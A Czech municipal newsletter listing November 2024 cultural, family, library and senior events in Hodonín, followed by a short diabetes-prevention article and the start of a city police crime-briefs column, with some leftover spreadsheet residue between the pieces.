Galerie výtvarného umění v Hodoníně Úprkova 2, 695 01 Hodonín , tel. 518 351 051, e-mail: info@gvuhodonin.cz, www.gvuhodonin.cz NOVINKA | HANDS ON rodinné výtvarné dílny pro nejmenší návštěvníky Nově je do programu galerie zařazena kreativní výtvarná dílna pro děti od 3 do 7 let s doprovodem. Do konce roku jsou v plánu ještě čtyři dílny v délce 60–90 minut. Střídají se dny zaměřené na různé výtvarné techniky a dny se čtením pohádek a tvořením – HANDS ON BOOK a HANDS ON ART. Všechny informace a termíny jsou zveřejněny na webu. Tak přijďte s dětmi tvořit pod vedením naší edukátorky – rezervace přes email kosutkova@gvuhodonin.cz nebo tel.: 775 948 501, cena: 100 Kč dítě + 50 Kč sourozenec, doprovod zdarma. čtvrtek 7. 11. 2024 9.30–11.00 HANDS ON BOOK | Příběh kocoura Jéni Dětem bude představen krátký příběh kocoura z malé knížečky, kterou galerie vydávala. Tu také dostanou a budou samy dotvářet ilustrace pomocí barevných bavlnek. čtvrtek 21. 11. 2024 9.30–11.00 HANDS ON ART | Socha a mramor, mramorování S dětmi prozkoumáme mramorové a bronzové sochy v galerii a vyrobíme si originální mramorovaný papír pomocí lihových barev. Komentovaná prohlídka výstavy | středa 13. 11. 2024 od 17.00 Přijďte si poslechnout vyprávění o tvorbě i životě keramika, sochaře a pedagoga Vladimíra Groše . Komentovaná prohlídka je připravena k právě probíhající výstavě s názvem Cesta z Majoliky do Kameniny a zase zpět a uskutečnit by se měla přímo s autorem. Cesta z Majoliky do Kameniny a zase zpět | Vladimír Groš | do 5. 1. 2025 V největším výstavním sále je k vidění více než čtyřicet děl keramika, sochaře a pedagoga, který už půl století obohacuje kulturní život na Slovácku nejen svými realizacemi ve veřejném prostoru. Vladimír Groš v tvorbě reaguje na všemožná říkadla i tradiční mudrosloví, myšlenkově rozvíjí slovní hříčky, nebo parafrázuje literární i každodenní události. Pracuje především s majolikou a kameninou a pod jeho rukama vznikají jak různé figurální plastiky, nádoby, tak další objekty například ve formě rozměrných keramických motorů. LAND/SCAPE | Veronika Remak Molatová | do 5. 1. 2025 Cit pro detail, jemnost, tajuplnost, emoce, ale i propracovanou techniku a důraz nejen na problémy současného světa. To vše v sobě zahrnuje tvorba malířky Veroniky Remak Molatové v druhém největším výstavním sále galerie. Obrazy zasahují diváka nejen svým zpracováním, ale nabízí mu i náhledy autorky na současné události, jako jsou přírodní katastrofy, válka nebo industrializace. Jakub Nepraš | videosculpture | do 5. 1. 2025 Významný český umělec Jakub Nepraš prezentuje v galerii propracované sochařské dílo spojené s videoprojekcí. Instalace zaujme nejen kombinací přírodních materiálů s moderními technologiemi, ale také důmyslně vytvořenou animací. Vystavený objekt je zároveň vícevrstvou metaforou. Vypovídá o neutuchající životní síle organismů i složitosti biologických procesů, ale zejména také o mezilidských vztazích a interakcích ve společnosti. Lázně Hodonín Přehled kulturních akcí v Lázních Hodonín 2. listopadu 2024 – sobota 19.00 JITŘENKA Taneční a poslechový večer 4. listopadu 2024 – pondělí 19.00 Divadelní soubor SVATOPLUK – AKTOVKY 6. listopadu 2024 – středa 19.00 SAVANA Taneční a poslechový večer 8. listopadu 2024 – pátek 19.00 Zpívání a povídání s harmonikou Poslechový večer 11. listopadu 2024 – pondělí 19.00 Manželé GRUGÍKOVI Lidový vypravěč Jožka ČERNÝ z Hodonína Poslechový večer 12. listopadu 2024 – úterý od 14.30 do 15.30 Hrátky s pamětí – zábavné trénování s pamětí se zkušenou lektorkou M. Češkovou 13. listopadu 2024 – středa 19.00 KV BAND Taneční a poslechový večer spojený s prezentací Vinařství Bartoník – Mikulčice 15. listopadu 2024 – pátek 19.00 COUNTRY TULÁCI Taneční a poslechový večer 18. listopadu 2024 – pondělí 19.00 JAMU BRNO Poslechový večer 20. listopadu 2024 – středa 19.00 DUO RUBÍN Taneční a poslechový večer 22. listopadu 2024 – pátek 19.00 Zpívání a povídání s harmonikou Poslechový večer 25. listopadu 2024 – pondělí 19.00 Manželé OSIČKOVI Poslechový večer při cimbálu 26. listopadu 2024 – úterý od 15.30 do 16.30 Tradice a zvyky z Podluží prezentuje Jaroslava Kundratová 27. listopadu 2024 – středa 19.00 KOMBET Taneční a poslechový večer spojený s prezentací Vinařství Bartoník – Mikulčice 28. listopadu 2024 – čtvrtek od 18.00 Přednáška – lektorka M. Češková Vše o medu a bylinách 29. listopadu 2024 – pátek 19.00 FENIXI Taneční a poslechový večer Není-li uvedeno konak, akce se konají v kulturním sále Lázní Hodonín , budova Eva Změna programu vyhrazena. Kontakt: kultura@laznehodonin.cz Provozní doba denních lázní WELLNESS ZÓNA / vstup 2 hodiny / bez rezervace: (bazén, whirlpool, sauny a sprchy, Kneippova léčba, lokální hibernace, relaxační místnost a vstup na zelenou střechu) ve dnech: Pondělí až pátek 14.00 – 21.00 Víkendy a svátky 10.00 – 20.00 PLAVÁNÍ / vstup 1 hodina / bez rezervace Úterý, středa, pátek 12.00 – 14.00 Další služby denních lázní s rezervací procedur: suchá masážní vana, masáže klasické, aroma masáže, masáž lávovými kameny, privátní sauna pro dvě až čtyři osoby, léčebné fitcentrum, jodobromová koupel. Kontakt: Denní lázně Hodonín , Měšťanská 140, 695 01 Hodonín , telefon: 518 395 506, e-mail: spa@laznehodonin.cz, www.laznehodonin.cz Informace o provozní době Krytého plaveckého bazénu a saun naleznete zde: https://www.laznehodonin.cz/ bazen/rozvrh-hodin-plavani Najdete nás také na facebooku: https://www.facebook.com/ laznehodonin/ Centrum pro rodinu a sociální péči Hodonín , z. s. Štefánikova 15, Hodonín , www.cprhodonin.cz Rodina a děti Herna: PO – PÁ 9.00–12.00; 14.00–18.30 Hřiště: Od listopadu uzavřeno Pro rodiče a děti Uspávání broučků 21. 11. v 16.00–18.30 každoroční podzimní rituál uspávání přírody před zimou s výrobou broučků a procházkou s lampióny. Informace: kocvarova@cprhodonin.cz, 720 410 988 a komosna@cprhodonin.cz, 720 410 988 Poselství Malého prince 28. 11. v 16.00–19.00: seminář inspirovaný tématikou knihy Malý princ s přesahem do výchovy děti s lektorkou Hanou Švandelkovou. Vhodné pro rodiče, učitele a dětí od 7 let. Informace: dolezalova@cprhodonin.cz. Kroužky pro rodiče a děti: poslední volná místa Klubík PO v 10.00–10.45 pro rodiče s více dětmi do 3 let Batolátka ST 9.00–9.45 pro rodiče s děti od 1 roku do 2 let Miminka ČT v 10.00–10.45 pro rodiče s dětmi od 4 do 12 měsíců Fyzioterapie pro rodiče s dětmi od narození: na individuální konzultace se můžete objednávat na tel. čísle 736 724 146 (možno psát SMS), příp. na emailu pakostova@seznam.cz Děti Kroužky pro děti od 3 let: poslední volná místa Hvězdičky ST 15.30–16.15 a 16.30–17.15 všeobecné pohybové aktivity pro kluky i holky Piruetka ČT 17.00–17.45 taneční základy a hrátky s hudbou. Výtvarníci ÚT 17.30–18.15 mix kreativních činností. Angličtina ÚT 15.30–16.15 angličtina pro děti 3–4 roky Kroužky pro děti od 6 let: poslední volná místa Keramické workshopy každý druhý čtvrtek 15.30 tvoření z keramické hlíny pro děti do 11 let, konaný jednou za 14 dní. Společně tanečně PO 16.30–17.15 různé druhy tanců Informace: kocvarova@cprhodonin.cz, 720 410 988 a komosna@cprhodonin.cz, 720 410 988. Bližší informace a přihlášky jsou na webu i Facebooku. Rodičovství Podpůrná skupina kojení, nošení a kontaktního rodičovství každou první středu měsíci v 16.00–17.00: o kojení, o kontaktním rodičovství, bezplenkové komunikační metodě, nošení v šátku a nosítku s Gabrielou Holiš. Těhotenský kruh každou první středu v měsíci v 17.30–18.30: podpora pro nastávající maminky. Příprava na laskavý porod a vědomé mateřství 4. 11., 11. 11., 18. 11. v 16.00–19.00: tři setkání s cílem praktické přípravy na porod s hypnoporodními technikami. Kde hledat pomoc při výchově a vzdělávání dětí s ADHD 20. 11. v 17.00–18.30 zmapování dostupné podpory pro rodiče a učitele dětí s ADHD s lektorkou Markétou Librovou. Informace: dolezalova@cprhodonin.cz, 702 125 564. Průvodce výchovou: individuální poradenství pro rodiče s lektorkou Soňou Tomíkovou. Termín si domluvte telefonicky na 737 832 333. Průvodce neklidem: vždy před setkáním skupiny o neklidných dětech, popř. online. Termín si domluvte na emailu dolezalova@cprhodonin.cz Manželé a páry Láskyplné vztahy 14. 11. v 17.00–18.30: Kurz na téma, jak formulovat pochvalu a vyjádřit vděčnost tak, aby to posílilo vztah a podpořilo dlouhodobou spokojenost Informace: dolezalova@cprhodonin.cz, 702 125 564. Základní sociální poradenství, individuální, rodinná a párová terapie, mediace. Informace: zalesakova@cprhodonin.cz, 602 632 943. Odborné služby pro rodiny Follow your dreams – podpůrná skupina, která je určena mladým dospělým 14–18 let, kteří se chystají na samostatný vstup do života. Šest setkání po dvou hodinách. Začínáme v říjnu. Svépomocná skupina pro rodiče – podpůrná skupina určená pro rodiče (matky, otce), kterým bylo soudem svěřeno dítě do výhradní nebo střídavé péče, popř. otcům či matkám, kteří o takovou péči usilují. Programem setkání je sdílení obav a zkušeností klientů, podpora v péči o domácnost, prohloubení rodičovských kompetencí. Celkem šest setkání po dvou hodinách. Začínáme na počátku listopadu. Podpůrná svépomocná skupina pro osvojitele – poskytne bezpečný prostor pro sdílení pocitů, zkušeností a výzev spojených s osvojením. Skupina nabízí možnost získat nové dovednosti a strategie pro zvládání rodičovské role a posílení komunikace v rodině. Na programu jsou vzdělávací aktivity, diskusní skupiny i workshopy s odborníky, kteří se zaměří na právní a psychologické aspekty osvojení. Celkem šest setkání po dvou hodinách jednou týdně. Začínáme v listopadu. Nabídka terapie (párová, rodinná, individuální, pro děti), mediace (vedena jedním či dvěma mediátory) v online prostředí nebo osobně. Individuální poradenství pro děti v bezpečném a důvěrném prostředí. Asistované předávání a kontakty. Poradenství pro dospělé při rozchodu a rozvodu rodičů, ale i v jakýchkoliv jiných nesnázích. Doprovázení rodiče po odebrání dítěte a rodiče, který nemá své dítě v péči. Podpora a doprovázení pěstounských rodin. Máme volnou kapacitu k uzavření Dohod o výkonu pěstounské péče. Informace: zalesakova@cprhodonin.cz, 602 632 943. Vzdělávací centrum pod Centrem pro rodinu Akreditované vzdělání pro sociální pracovníky, pracovníky v sociálních službách, ale i veřejnost. Nabídku naleznete na webových stránkách. Informace: zalesakova@cprhodonin.cz, 602 632 943. Připravujeme Vánoční ladění 12. 12. v 15.30—18.30: kreativní Vánoční workshop s malováním perníčků s perníkářkou Ivou Redkovou. Masarykovo muzeum v Hodoníně Zámeček, Zámecké náměstí 27/9, Hodonín , tel. 518 351 834 e-mail: masarykovomuzeum@masaryk.info Tomáš Garrigue Masaryk v Hodoníně 18. června 1924 do 31. 11. 2024 Masarykovo muzeum v Hodoníně zve na výstavu fotografií Tomáš Garrigue Masaryk v Hodoníně (18. června 1924) v zahradě zámečku. Vstup do zahrady je zdarma, a to vždy v rámci otvírací doby určené pro veřejnost. Modré na bílém – Antonie Dostálková a její modrotisková tvorba 1. 11. 2024 – 16. 3. 2025 Výstava prezentuje tvorbu Antonie Dostálkové, rodačky ze Starého Města . Textilní technice modrotisku zasvětila podstatnou část svého života. Na základě vlastních návrhů vytváří různé textilní předměty. Inspiraci nachází ve světě pohádek, v přírodě či lidových zvycích. Dlouhodobě spolupracuje s modrotiskovou dílnou Jochových ze Strážnice . Svými originálními náměty propaguje řemeslo, které bylo roku 2018 zapsáno na seznam nehmotného kulturního dědictví UNESCO. Budova sálu Evropa , Národní tř . 21, Hodonín tel. 518 352 271, e-mail: evropa@masaryk.info Samuraj Miyamoto Musaši, jeho doba, souboje a odkaz 20. 9. 2024 – 23. 2. 2025 Výstava historických originálů japonských mečů a dalších artefaktů z českých sbírek představí fascinující osobnost Miyamoto Musašiho (1583–1645), slavného mistra meče, myslitele a současně skvělého malíře ve stylu monochromní tušové malby. Koncert rodin 16. listopadu v 16.00 Koncert rodin, ve kterém se představí muzikální rodiny našeho regionu. Pro děti připraven dětský koutek, pro dospělé občerstvení. Pořádá Centrum pro rodinu a sociální péči. Vstupné dobrovolné Archivářka 20. listopadu v 18.30 Archivářka aneb Jizva na duši Hodonína . Úspěšné představení amatérského divadelního uskupení TEATRÁL, ke smutnému výročí 80 let od bombardování Hodonína . Vstupné na místě 60 Kč Středisko volného času Hodonín příspěvková organizace nám B. Martinů 2952/5. Hodonín . Tel: 725 341 591, bmvedouci@svchodonin.cz , www.svchodonin.cz, f: Středisko volného času Hodonín Adventní věnce a dekorace 29. 11. – od 14.00 do 18.00, 30. 11. – 13.30 do 16.30 Tvoření se zkušenými aranžérkami, materiál i jehličí k dispozici na místě. Centrum ekologické výchovy Dúbrava při SVČ Hodonín nám. B. Martinů 2952/5, 695 03 Hodonín ekocentrum.hodonin@seznam.cz, www.ekocentrumhodonin.cz, Tel.: 608 123 535 zve na přednášku Polárním Grónskem – 20. 11. v 18.00 O dvou grónských cestách přednáší Anežka Plintovičová Klub mladých Střediska volného času Hodonín Horní Valy 2, 695 01 Hodonín , tel. 725 341 592 e-mail: km.hodonin@seznam.cz, facebook: Klub mladých Plakátky a podrobnější informace (dny, hodiny) k jednotlivým kroužkům a kurzům facebook: Klub Mladých! PRAVIDELNÉ AKTIVITY – STÁLE VOLNÁ MÍSTA Pondělí: PŘEDŠKOLÁČEK 15.30–16.30 Pro děti předškolního věku. Škola hravou formou. Schopnosti a vědomosti, které uplatní každý prvňáček. VŠEZNÁLCI 16.30–17.30 Pro děti od 5 let. Poznávání světa kolem nás. Rozvíjení vědomostí hravou formou a zážitkovým učením Úterý: ROZTLESKÁVAČKY 15.30–16.30 Pro holky a kluky od 6 do 12 let. Je určen všem, kteří mají rádi pohyb a hudbu. Zábavná forma výuky tanečních kroků, gymnastických prvků a týmové spolupráce. K-WAVE 16.00–17.00 Pro holky a kluky od 11 do 14 let. Oblíbený a populární hudební směr K-POP. Nácvik tanečních kroků a choreografií K-POP skupin. DANCING QUEENS 16.30–17.30 Je ti 10–15 let a líbí se Ti Hip Hop, RnB, Dancehall? Máš možnost zkusit tyto taneční styly a naučit se něco nového. Středa: ENGLISH FOR KIDS 15.00–16.00 Učení základů angličtiny formou pohybových aktivit, her, říkánek a písniček. Pro děti od 6 let. GYMNASTIKA HROU 15.30–16.30 Pro děti od 7 let. Přijďte se naučit základní prvky gymnastiky a pohybové přípravy. Čtvrtek: DRAMAŤÁČEK 15.00–16.00 pro holky a kluky od 5 do 8 let DRAMATICKÝ KROUŽEK 16.00–17.00 pro holky a kluky od 9 do 15 let Rozvoj rytmických a pohybových dovedností, jevištního vystupování a dramatického projevu v rámci nácviku div. hry. ŠIKOVNÉ RUČIČKY 15.00–16.00 Zájmový útvar pro děti od 6 let. Podpora kreativního myšlení. Práce s neobvyklým materiálem, různé výtvarné techniky. ŠIKULOVÉ 16.00–17.00 Zábavné pohybové hry a cvičení pro děti od 4 do 6 let. Pátek: G. LUN 16.00–18.00 Máš rád K-pop a je ti mezi 15 a 20 lety? Přijď s námi nacvičit tanec podle korejsko-popové choreografie. Úterý, středa, čtvrtek: Dopolední programy MEDVÍDKA BUBU 9.30–11.00 Pro děti od 16 měsíců do 4 let. Pohybové hry a cvičení, výtvarné a hudební aktivity, rozvoj dětské fantazie AKCE LISTOPAD DĚTSKÁ KREATIVITA 14. 11. 2024 – 15.00–16.00 Zážitková pedagogika se zaměřením na grafomotoriku a jemnou motoriku v rámci výtvarné dílny – zábavnou a hravou formou. Pro děti od 5 let. MAMINCE S LÁSKOU 19. 11. 2024 – 9.30–11.00 Pohybové hry, výtvarné tvoření a spousta zábavy pro maminky a jejich ratolesti od 16 měsíců do 4 let. SPORTU ZDAR 21. 11. 2024 – 16.00–17.00 Zábavné sportovní odpoledne pro děti, které milují pohyb. PŘIPRAVUJEME NA PROSINEC: MIKULÁŠSKÉ PŘEKVAPENÍ pro malé andílky 5. 12. 2024 – 9.30–11.00 Zábavný program a spousta legrace pro naše nejmenší s mikulášskou nadílkou. Přihlášky do 28. 11. Kontakt: km.hodonin@seznam.cz, 725 341 595. PŘEDVÁNOČNÍ SPORTOVÁNÍ 12. 12. 2024 – 16.00–17.00 VÁNOČNÍ VÁBENÍ medvídka Bubu 19. 12. 2024 – 9.30–11.00 Senioři ČR, z. s., Hodonín Senioři ČR, z. s., městská organizace Hodonín Horní Valy 2, tel. 518 340 147 Úřední hodiny v úterý 9.00–12.00 Právní poradna JUDr. Račické pro velký zájem pokračuje, objednání zprostředkuje Ing. Polášek na výše uvedeném tel. čísle. Každé pondělí přátelské posezení v klubovně seniorů od 15.00 Každé úterý sportovní hry našem sídle od 14.00 Každé středeční odpoledne jsou v klubovně seniorů hudební zkoušky sboru Sexteto Plus. 7. 11. ve 14.00 – posezení s jubilanty v klubovně seniorů Od 9. 11. do 7. 12. – každou sobotu plavání v Lázních Hodonín od 14.00 do 15.00. Vyřizuje p. Pleskačová. 12. 11. – zájezd na svatomartinskou husu do Tvrdonic , odjezd ve 12.30 od vlakového nádraží. Cena za dopravu tam i zpět je 100 Kč. Vyřizuje p. Zipperová. 24. 11. – zájezd na Vánoční trhy Brno , v 18.00 muzikál Heidi v Městském divadle Brno. Odjezd ve 13.00 od vlakového nádraží, vyřizuje p. Stahalová Připravujeme na prosinec: 5. 12. ve 14.00 – posezení při svíčkách v klubovně seniorů Regionální centrum Hodonín Zve na křest knihy Dagmar Kožinové Síla vize v osobním životě Těšíme se na vás ve čtvrtek 7. listopadu v 16 hod. Městská knihovna Hodonín Národní třída 36 – tel.: 518 321 213, 724 055 952 • pobočka Brandlova 81 – tel.: 518 321 212 , 725 965 653 • www.knihovnahod.cz Důležité upozornění V budově knihovny na Národní třídě stále probíhá rozsáhlá rekonstrukce. Dodržujte prosím bezpečnostní pokyny a dbejte zvýšené opatrnosti. O případných omezeních provozu budete informování prostřednictvím našich webových stránek a sociálních sítí. Děkujeme za pochopení a těšíme se na vaši návštěvu. VÝSTAVNICTVÍ 26. 10. – 30. 11. / Jiří Jakub Mašek / KONCEPT 2024 / Galerie Vednevnoci Díla hodonínského grafika a výtvarníka Jiřího Jakuba Maška, který je znám také svým zaujetím mandalami. Vystavené grafiky v tištěné podobě obsahují také původní QR kódy, jejichž zobrazením v mobilním zařízení lze přečíst zdrojové texty. AKCE 1. 11. – 30. 11 / Sbírka ke dni válečných veteránů Den válečných veteránů se slaví celosvětově 11. listopadu, u příležitosti konce první světové války. Také naše knihovna se zapojila do veřejné finanční sbírky, kterou pořádá nezisková organizace Post Bellum pro projekt Paměť národa. Prostředky jsou určené na jejich přímou podporu a natáčení dokumentů o těchto výjimečných lidech. Podpořit je můžete zakoupením květu vlčího máku. Více informací najdetena https://www.pametnaroda.cz/cs a https://denveteranu.cz/ Pondělí 4. 11. / Kybernetická bezpečnost – Český telekomunikační úřad Lektorka JUDr. Alena Sejková poradí a vysvětlí co je kybernetická bezpečnost, jak se bezpečně chovat na síti a čeho se vyvarovat. Součástí přednášky je i závěrečná diskuze. 9.30–10.30 / Zasedací sál Úterý 5. 11. / Stammtisch 10 let Štamgastský stůl Hodonín Přátelské posezení u příležitosti desetiletého výročí německy hovořící skupiny. Oslavu zahájí hlavní organizátor a zakladatel hodonínského Stammtische Erich Sevcik. V programu vystoupí Dieter Stange a představí činnost a poslání Stammtisch. Připraven je i hudební doprovod Ericha Ziba z Vídně a Kapely starých časů z Prušánek . Občerstvení zajištěno. Nutná registrace předem, formulář je zveřejněn na webových stránkách knihovny. 16.30–21.00 / Zasedací sál Středa 6. 11. / Když něco bolí, je to signál, člověče, zastav se a něco s tím udělej Přednáška chiropraktika Ing. Vinciho Lászla s besedou a praktickými ukázkami. Jak se zbavit bolesti bez prášků a injekcí. Výuka východních praktik. 16.30–17.30 / Přednáškový sál Čtvrtek 7. 11. / SONS poradenství pro zrakově postižené Odborné poradenství poskytne sociální pracovnice SONSu Kyjov Hana Vrtková. 10.00–12.00 / ProSenior Pátek 8. 11. / Nejlepší dárek je vlastnoručně vyrobený dárek Korálková dílnička s lektorkou Miladou Češkovou. Výroba náušnic ve tvaru kytičky. 14.00–16.00 / Přednáškový sál Středa 13. 11. / Thanksgiving Day with Blair Anglická konverzace, seznámení se s tradicí Dne Díkuvzdání, který letos připadá na 28. listopadu. 17.00–18.00 / Přednáškový sál Čtvrtek 14. 11. / Hodonínské domy vyprávějí II. Pokračování přednášky Mgr. Galiny Rucké a Mgr. Hany Sýkorové o nejzajímavějších osudech významných hodonínských domů v období od konce 19. století do čtyřicátých let 20. století. 17.00–18.00 / Přednáškový sál Úterý 19. 11. / Základy aromaterapie s Márií Brezovskou Povídání o léčbě vůněmi z éterických olejů, které mají blahodárný vliv na lidské tělo a psychiku. 16.30–17.30 / Přednáškový sál Pátek 29. 11. / Tvořívá dílna: Vytvoř si svou Vision Board Vytvořte si nástěnku vizí, snů a cílů na rok 2025, formou koláže výstřižků z časopisů a novin. Tvořivou činností provádí lektorka Michaela Záleská. 14.00–17.00 / Přednáškový sál Čeština pro cizince Každou středu 15.30–16.30 začátečníci a 16.30–18.00 mírně pokročilí. Lektorka Mgr. Jana Lamačová Zasedací sál. Sobota 30. 11. / Den otevřených dveří a Den pro dětskou knihu Tradiční tvořivé dílničky se zdobením perníčků, vykrajováním mýdélek, vyráběním vánočních svícnů a dárkových náramků z korálků , prodej cínových šperků a dětských knih, představení našeho technologického vybavení a robotů i produktů 3Dtisku v rámci CoderDojo klubu, VR. Pohádkování s Ingrid Nesvadbovou – divadélko pro děti a vyhodnocení soutěže Od A do Zet Ivony Březinové doprovázené vystoupením žáků ZUŠ Hodonín . Podrobnější program najdete na webových stránkách knihovny a sociálních sítích. 9.00–12.00/ Hlavní budova Městské knihovny Hodonín TÝDEN PRO DIGITÁLNÍ ČESKO Středa 20. 11. / Svět za zrcadlem Prevence závislosti na informačních a komunikačních technologiích a aplikacích tzv. „digitální závislosti“. Doporučení v oblasti edukace s cílem zvýšit úroveň kybernetické bezpečnosti jak dospělých, tak zejména dětí. Přednáší Jan Koluch, metodik kybernetické bezpečnosti ze sdružení CESNET . Organizuje odbor sociálních věcí a školství Městského úřadu Hodonín. 16.00–18.00 / Zasedací sál Čtvrtek 21. 11. / eStát – Jak využít výhody digitalizace naplno Potřebujete zažádat o nový občanský průkaz, zkontrolovat stav bodového konta nebo vyřídit jinou úřední záležitost? Díky digitalizaci státní správy to dnes vše zvládnete online. Na tomto workshopu vám ukážeme, jak efektivně využívat Portál občana, jak se přihlásit k elektronickým dokumentům a co vše můžete řešit prostřednictvím moderních technologií. Přednáší lektoři z Institutu pro politiku a společnost. 16.30–18.30 / Přednáškový sál Čtvrtek 21. 11. / CoderDojo Audiovizuální koutek s Tomášem Theurem. 16.00–18.00 / PC učebna Pátek 22. 11. / Strojové učení, a co z něho plyne pro běžného člověka Přednáška Jana Englera na téma Umělá inteligence. Dnešní modely umí pochopit mluvenou řeč, řídit auto, nebo vygenerovat obrázek či esej, a to většinou lépe než člověk. Toto téma bude v budoucích letech víc zasahovat do našich životů, i laik má právo o něm být informován. Cílem přednášky je přiblížit, jak celý proces Strojového učení funguje, a co nám může tato nová technologie přinést. 17.00–18.30 / Přednáškový sál Není-li uvedeno jinak, vstupné zdarma. Změna programu vyhrazena. DĚTSKÉ ODDĚLENÍ A ZAŠÍVÁRNA Čtvrtek 7. 11. / Škvrňata a batolata do knihovny natotata Pohádkování s Ingrid Nesvadbovou v rámci celorepublikového projektu Bookstart aneb S knížkou do života. 9.00–9.30 a 10.00–10.30 / Oddělení pro děti Každý pátek / Deskové hry pro děti Hrajete rádi deskové hry? Chcete potkat nové kamarády a spoluhráče, vyzkoušet něco nového? Věková hranice 8+, mladší děti s doprovodem. 14.00–16.30 / Oddělení pro děti Klub CoderDojo Máš 7–17 let a baví tě programování? Přijď se podívat do našeho klubu CoderDojo. Přihlašovat se můžete průběžně, přihlášku najdete na našich webových stránkách nebo přímo v knihovně v Oddělení pro děti nebo na Pobočce Brandlova. Přihlášku vyplňte a vezměte si ji s sebou do knihovny. Středa 13. 11. / 27. 11. / CoderDojo 3D tisk s Danielem Králem 16.00–18.00 / PC učebna Čtvrtek 14. 11. / 28. 11. / CoderDojo Lekce programování a robotiky s Matyášem Vrňákem 16.00–18.00 / PC učebna Čtvrtek 7. 11. / 21. 11. / CoderDojo Audiovizuální koutek s Tomášem Theuerem 16.00–18.00 / PC učebna ProSenior Úterý 5. 11. a 19. 11. / Hrátky s pamětí Tradiční procvičování mozkových závitů v podání lektorky Milady Češkové. 9.30–10.30 / Zasedací sál Každé úterý a čtvrtek / Deskové a karetní hry Přijďte si zahrát karetní a deskové hry do knihovny. 10.30–13.30 / ProSenior Čtvrtek 7. 11. / 14. 11. / 21. 11. / 28. 11. / Cvičení na židli a u židle Protahovací a posilovací cvičení s prvky Tai Chi a Čchi-Kung. 9.30–10.30 / Zasedací sál Pondělí 4. 11. / 11. 11. / 18. 11. / 25. 11. Cvičení Tai Chi pro pokročilé. Informace na telefonu: 772 269 843. 18.30–19.30 / Přednáškový sál Komunitní centrum Pravoslava Veselého 40, Hodonín Připravujeme se na Vánoce! Pokud rádi tvoříte a chcete si při tom popovídat, zveme vás na předvánoční tvořivé dílny. Společně budeme vyrábět přáníčka, záložky do knih, adventní kalendáře, svícny, věnce, ozdoby na okno nebo stromeček a zdobit perníčky. Dílny se konají každé pondělí od 17.00 do 19.00 (přijít i odejít můžete kdykoli) v těchto termínech: 4. 11., 11. 11., 18. 11., 25. 11., 2. 12. a 9. 12.2024. Co si vzít s sebou? Všechny potřebné materiály budou k dispozici. Přesný program jednotlivých dílen najdete na www.kcks.cz – předvánoční tvoření Rezervace místa je možná na tel.: 721 486 120 nebo e-mailu: obchod@mirfa.cz. Cena je 100 Kč jako příspěvek na materiál za jednu dílnu. Během dílen bude otevřena i naše mini kavárna s nabídkou kávy a čaje. Těšíme se na vás a přejeme krásný podzim! Českobratrská církev evangelická Hodonín Máte rádi lidové písničky z nejvzdálenějšího kouta hodonínského okresu? My také, proto přivítáme ženský a mužský pěvecký sbor z Hrubé Vrbky. Přijďte potěšit duši krásnými písněmi a oko pohledem na unikátní horňácký kroj. Těšíme se na vás v neděli 10. 11. 2024 v 15.00 v evangelickém kostele v Hodoníně , Husova 6. Vstupné dobrovolné Církev adventistů sedmého dne Srdečně vás zveme na poutavou přednášku Juana Pabla Malangy ZDRAVÉ CESTY KE ŠTĚSTÍ – 29. 11. 2024 v 18.00 V prostorách sboru CASD , Havlíčkova 29a, Hodonín Vstupné dobrovolné Juan Pablo pochází z Kolumbie a sám prošel závislostí na drogách. V současnosti je ředitelem organizace Libre Mente, která pomáhá drogově závislým na jejich cestě ke svobodě. Můžete se těšit na praktické tipy, osobní zkušeností a rady, jak pomoci těm, kteří se závislostí zápasí. Průmyslovka Hodonín letos slaví 70 let U příležitosti oslav významného výročí školy jsou na obou jejích budovách mimořádné Dny otevřených dveří.</t>
  </si>
  <si>
    <t>20241101_725_3266718504_a1d68901f2d65e99415a.html</t>
  </si>
  <si>
    <t>a1d68901f2d65e99415a</t>
  </si>
  <si>
    <t>Cukrovka zpočátku nebolí. Riziko vzniku diabetu si i letos připomeneme 14. listopadu</t>
  </si>
  <si>
    <t>Cukrovka zpočátku nebolí. Riziko vzniku diabetu si i letos připomeneme 14. listopadu Zdůraznit prevenci diabetu, ve které hlavní roli hraje zdravý životní styl, si každoročně klade za cíl Světový den diabetu. Podle statistik v posledních letech počet lidí s cukrovkou dramaticky stoupá, aktuálně každý třetí Čech starší 65 let je diabetik. A dynamika bude pokračovat. Většina lidí onemocní diabetem 2. typu, k jehož příčinám patří nejen nadváha a obezita, ale také pití alkoholu a kouření. K diabetu se často přidružují vysoký cholesterol a vysoký krevní tlak, které zvyšují riziko kardiovaskulárních onemocnění a demence. Dobrou zprávou pro pacienty hodonínské nemocnice je, že Česká obezitologická společnost jí potvrzuje v souladu s kritérii status centra bariatrické a metabolické chirurgie, které ulevují od nadbytečných kilogramů pacientům s morbidní obezitou. Pokud se ovšem chcete vyhnout operačním řešením, předejít mu lze jednoznačně úpravou životního stylu. K pestré stravě plné vitamínů a prospěšných tuků přidejte denně půlhodinu pohybu, například rychlejší chůze, kolo nebo práci na zahradě. Pravidelně měřte obvod pasu. U žen by neměl být vyšší než 88 cm, u mužů 102 cm. Uzavírání tepen, které může vyústit v neuropatii, selhání ledvin či ztrátu zraku, předejdete také udržováním optimální tělesné hmotnosti. Právě obezita totiž přispívá k 75 % případů vzniku cukrovky 2. typu. Nemocnice nabízí také služby diabetologické ambulance. Více: nemho.cz/diabetologicka-ambulance</t>
  </si>
  <si>
    <t>20241101_726_3281074318_807c9b0288d8aef2620e.html</t>
  </si>
  <si>
    <t>807c9b0288d8aef2620e</t>
  </si>
  <si>
    <t>KRIMI STŘÍPKY Z MĚSTSKÉ POLICIE</t>
  </si>
  <si>
    <t>KRIMI STŘÍPKY Z MĚSTSKÉ POLICIE Zadržena celostátně hledaná osoba Dne 16. 9. v nočních hodinách kontrolovali strážní v ulici Čapkova skupinu osob. Při jejich ztotožňování bylo u jedné z nich zjištěno, že se nachází v databázi hledaných osob. Následně tak 29letý muž z Milovic cestoval s přivolanými policisty na obvodní oddělení do Milovic . Pravidelné kontroly městského majetku Jedná se o běžnou preventivní činnost, kdy se strážníci v nočních hodinách zaměřují na kontrolu městského majetku. Nejinak tomu bylo i dne 16. 9. v 1.20 hodin v areálu v ulici Čechova. Při této kontrole byl ztotožněn 29letý muž z Milovic , který se zde nacházel v rozporu s provozním řádem areálu. Navíc bylo zjištěno, že osoba je v hledáčku Policie ČR za majetkovou trestnou činnost. Pro pejska si majitelka přijela pod vlivem alkoholu Poměrně kuriózní případ se stal dne 16. 9. v 13.35 hodin, kdy 50letá majitelka psa telefonicky požádala o jeho vydání z útulku, kam byl umístěn téhož dne. Na tom by nebylo nic neobvyklého, kdyby ovšem majitelka nedorazila 